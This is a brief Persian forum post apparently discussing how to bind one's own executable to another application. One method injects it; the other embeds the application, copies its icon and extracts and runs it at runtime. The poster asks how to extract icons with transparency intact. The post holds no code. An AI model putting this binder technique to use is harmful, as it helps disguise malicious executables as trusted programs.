2 - Application به فایل exe ما بچسبه !
به زبان ساده تر در روش اول ما فایلمون رو Inject می کنیم به یک Application (روشی که جناب mbt گفتن) که یقیناً دشوار هم هست .

و در روش دوم Application رو می خونیم و در برناممون ذخیره می کنیم و پس از استخراج آیکون مربوطه، آیکون فایل خودمون رو تغییر می دیم و در زمان اجرا هم که مشخصه میایم App رو از فایلمون استخراج کرده و Run می کنیم .

ولی مشکل من اینجاست که آیکون Application رو چه جوری استخراج کنیم که دچار تغییر نشه (به عبارتی کیفیتش تغییر نکنه و شفاف (transparent) باشه ؟!!

به نظر من اگه مثل پکر ها فکر کنیم به نتیجه ای برسیم